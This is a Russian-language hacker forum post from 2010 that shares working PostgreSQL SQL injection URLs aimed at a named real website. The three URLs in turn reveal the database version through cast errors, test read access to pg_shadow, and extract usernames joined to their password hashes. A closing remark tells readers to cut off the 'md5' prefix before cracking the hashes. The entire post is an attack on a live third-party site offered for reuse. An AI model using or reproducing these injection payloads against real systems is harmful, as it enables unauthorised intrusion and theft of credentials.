21.07.2010, 17:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://rantburg.com PR-6
// смотрим версию Postgre
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(version () as int)+from+pg_user&D=2006-01-30&SO=&HC=1
// смотрим доступ к pg_shadow
http://rantburg.com/poparticle.php?ID=141137+union+select+version()::i nt+from+pg_shadow&D=2006-01-30&SO=&HC=1
//круто! есть доступ к pg_shadow, попробуем вытащить логин и пароль
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(usename ||chr(58)||passwd as int)+from+pg_shadow&D=2006-01-30&SO=&HC=1
з.ы хочу напомнить что первые три символа xэша это алгоритм шифрования, в нашем случаe md5, при расшифровке нужно это вырезать
|
|
|